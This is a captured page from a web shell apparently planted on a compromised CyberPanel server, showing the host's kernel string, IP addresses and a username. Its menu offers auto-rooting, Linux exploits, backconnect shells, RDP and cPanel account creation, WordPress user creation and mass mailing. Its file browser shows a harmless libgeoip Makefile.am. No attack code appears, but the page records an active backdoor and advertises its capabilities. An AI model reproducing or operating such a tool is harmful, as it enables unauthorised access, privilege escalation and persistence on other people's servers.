Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libgeoip-dev /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile.am
1.1
KB
-rw-r--r--
Makefile.in
39.3
KB
-rw-r--r--
Makefile.vc
553
B
-rw-r--r--
benchmark.c
5.6
KB
-rw-r--r--
city_test.txt
86
B
-rw-r--r--
country_test.txt
1.22
KB
-rw-r--r--
country_test2.txt
1006
B
-rw-r--r--
country_test_name.txt
13
B
-rw-r--r--
fail_test.txt
18
B
-rw-r--r--
proxy_test.txt
261
B
-rw-r--r--
region_test.txt
492
B
-rw-r--r--
test-geoip-asnum.c
1.59
KB
-rw-r--r--
test-geoip-city.c
2.53
KB
-rw-r--r--
test-geoip-domain.c
1.94
KB
-rw-r--r--
test-geoip-invalid-file.c
823
B
-rw-r--r--
test-geoip-isp.c
1.6
KB
-rw-r--r--
test-geoip-netspeed.c
1.84
KB
-rw-r--r--
test-geoip-org.c
1.93
KB
-rw-r--r--
test-geoip-region.c
3.53
KB
-rw-r--r--
test-geoip.c
5.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile.am
check_PROGRAMS = test-geoip test-geoip-invalid-file noinst_PROGRAMS = benchmark test-geoip-region test-geoip-city test-geoip-org test-geoip-domain test-geoip-asnum test-geoip-isp test-geoip-netspeed EXTRA_PROGRAMS = benchmark \ test-geoip-region \ test-geoip-city \ test-geoip-org \ test-geoip-domain \ test-geoip-asnum \ test-geoip-isp \ test-geoip-netspeed LDADD = $(top_builddir)/libGeoIP/libGeoIP.la AM_CPPFLAGS = -I$(top_srcdir)/libGeoIP -DSRCDIR=\"$(top_srcdir)\" -Wall test_geoip_SOURCES = test-geoip.c test_geoip_invalid_file_SOURCES = test-geoip-invalid-file.c test_geoip_region_SOURCES = test-geoip-region.c test_geoip_org_SOURCES = test-geoip-org.c test_geoip_domain_SOURCES = test-geoip-domain.c test_geoip_isp_SOURCES = test-geoip-isp.c test_geoip_asnum_SOURCES = test-geoip-asnum.c test_geoip_netspeed_SOURCES = test-geoip-netspeed.c test_geoip_city_SOURCES = test-geoip-city.c benchmark_SOURCES = benchmark.c EXTRA_DIST = Makefile.vc city_test.txt country_test.txt country_test2.txt country_test_name.txt region_test.txt TESTS = test-geoip test-geoip-invalid-file
Close